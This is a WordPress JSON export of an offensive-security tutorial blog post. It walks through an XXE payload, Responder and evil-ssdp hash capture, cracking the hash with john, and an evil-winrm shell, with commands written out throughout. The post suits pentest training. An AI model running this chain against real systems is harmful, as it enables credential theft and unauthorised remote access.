{"id":487,"date":"2022-05-08T22:18:25","date_gmt":"2022-05-08T22:18:25","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=487"},"modified":"2022-05-08T22:20:21","modified_gmt":"2022-05-08T22:20:21","slug":"from-xxe-to-rce","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/from-xxe-to-rce\/","title":{"rendered":"From XXE to RCE"},"content":{"rendered":"\n
<\/span>\"S1REN
\n

[ XXE to RCE ]<\/p>\n\n\n\n

S1REN - OFFENSIVE SECURITY<\/sub><\/p>\n<\/div><\/div>\n\n\n\n

Because let's admit it - you thought you could only read files.

Discovery Phase:<\/strong><\/p>\n\n\n\n

<?xml version = \"1.0\"?><!DOCTYPE foo [<!ENTITY own SYSTEM \"file:\/\/\/c:\/windows\/win.ini\"> ]>\n<person>\n<name>offsec\n\t&own;\n<\/name>\n<\/person>\n<\/code><\/pre>\n\n\n\n
If we can verify that we're able to read the contents of a file-system with XXE - we're able to move on.

You're going to need a few things for this to work though.<\/strong><\/p>\n\n\n\n
  • Responder<\/li>
  • evil-ssdp<\/li>
  • evil-winrm<\/li><\/ul>\n\n\n\n

    Go ahead and get a Responder<\/strong> session running.<\/p>\n\n\n\n
    responder -I tun0 -v<\/code><\/pre>\n\n\n\n
    Now that we have a Responder session running, we need to do a little bit of evil magic<\/em>.

    Open a new terminal, and in that terminal - let's start up evil-ssdp.py<\/strong><\/p>\n\n\n\n
    python3 \/usr\/share\/evil-ssdp\/evil_ssdp.py <interface><\/code><\/pre>\n\n\n\n
    This should give you output that looks something akin too...:<\/p>\n\n\n\n
    ___________     .__.__    _________ _________________ __________\n\\_   _____\/__  _|__|  |  \/   _____\/\/   _____\/\\______ \\\\______   \\\n |    __)_\\  \\\/ \/  |  |  \\_____  \\ \\_____  \\  |    |  \\|     ___\/\n |        \\\\   \/|  |  |__\/        \\\/        \\ |    `   \\    |\n\/_______  \/ \\_\/ |__|____\/_______  \/_______  \/\/_______  \/____|\n        \\\/                      \\\/        \\\/         \\\/\n<\/strong>\n...by initstring (gitlab.com\/initstring)\nAdditional contributors: Dwight Hohnstein\n\n########################################\n[*] EVIL TEMPLATE:           \/usr\/share\/evil-ssdp\/templates\/office365\n[*] MSEARCH LISTENER:        tun0\n[*] DEVICE DESCRIPTOR:       http:\/\/x.x.x.x:8888\/ssdp\/device-desc.xml\n[*] SERVICE DESCRIPTOR:      http:\/\/x.x.x.x:8888\/ssdp\/service-desc.xml\n[*] PHISHING PAGE:           http:\/\/x.x.x.x:8888\/ssdp\/present.html\n[*] SMB POINTER:             file:\/\/\/\/\/x.x.x.x\/smb\/hash.jpg<\/strong>\n########################################\n<\/code><\/pre>\n\n\n\n
    Thanks Dwight.

    The idea behind this attack is that we're going to utilize whatever protocol native to Windows that we can. There are a few options. We have:<\/p>\n\n\n\n
    ftp:\/\/\nfile:\/\/\/\nhttp:\/\/\n(If the target machine has PHP installed, we're in luck with that as well)\nphp:\/\/filter\/convert.base64-encode\/resource=c:\/windows\/win.ini\nphp:\/\/filter\/convert.base64-encode\/resource=http:\/\/atacking-machine:80\/evil.txt<\/code><\/pre>\n\n\n\n
    The one we're interested in is the file:\/\/\/<\/strong> protocol.<\/p>\n\n\n\n
    I suggest using Burp Suite's Repeater - but feel free to do whatever you want. The idea is that we're going to use the file:\/\/\/<\/strong> to point towards our SMB Share (CIFS or Common Internet File Structure). When we do so, Responder will capture the NTLM hash. 

    Nice, eh?<\/em><\/p>\n\n\n\n
    [SMB] NTLMv2-SSP Client   : ::ffff:[REDACTED]\n[SMB] NTLMv2-SSP Username : [REDACTED-PC]\\[REDACTED-USER]\n[SMB] NTLMv2-SSP Hash     : [REDACTED-USER]::WIN-REDACTED:ffda536eebddd9ff:56608E6BB63B9EF8075E75E6FCFEAD13:010100000000000080070C0C4462D8014105FCCC2A7C88C7000BBB00020008004B0049003000490001001E00570049004E002D0046004E0056005800580034005800530047004900470004003400570049004E002DAA46004E005600580058003400580053004700490047002E004B0Z4900300049002E004C004F00430041004C00030014004B004300300049002E004C004F00470041004C00050014004B004900200049002E004C004F004300410C4C000700080080070B0B4462D8010600040002000000080030003000000000000000000000000030000074C73B2884C3F6CAB391C1BFDD689CBD8363A424AAAA27C415102C0CDA855CE20A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003710000000000000000000000000<\/code><\/pre>\n\n\n\n
    This hash won't crack, because I changed up a few things for Security reasoning. But if you ever do receive a NTLMv2 hash like this, try cracking with john<\/strong>.<\/p>\n\n\n\n
    john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash.txt<\/code><\/pre>\n\n\n\n
    Let's suppose it gave us the password 'ohnoitss1ren<\/strong>'.<\/p>\n\n\n\n

    $<\/strong>---Bling Bling---$<\/strong><\/em><\/p>\n\n\n\n
    <\/p>\n\n\n\n
    From this point forward, we're going to make use of one of my favorite tools. evil-winrm<\/strong> to gain a shell on the target machine.<\/p>\n\n\n\n
    evil-winrm -i <target-box> -u <target-username> -p ohnoitss1ren<\/strong><\/code><\/pre>\n\n\n\n
    With that, you'll get a shell.<\/p>\n\n\n\n
    From XXE<\/strong>.<\/p>\n\n\n\n
    to RCE<\/strong>.<\/p>\n\n\n\n
    -S1REN<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    Because let's admit it - you thought you could only read files. Discovery Phase: If we can verify that we're able to read the contents of a file-system with XXE - we're able to move on. You're going to need a few things for this to work though. Responder evil-ssdp evil-winrm Go ahead and get […]<\/p>\n","protected":false},"author":1,"featured_media":488,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[81,80,77,12,74,79,4,34,78,73,75],"class_list":["post-487","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-evil-ssdp","tag-evil-winrm","tag-guide","tag-pentest","tag-rce","tag-responder","tag-s1ren","tag-siren","tag-windows","tag-xxe","tag-xxe-to-rce"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=487"}],"version-history":[{"count":6,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/487\/revisions"}],"predecessor-version":[{"id":495,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/487\/revisions\/495"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/488"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}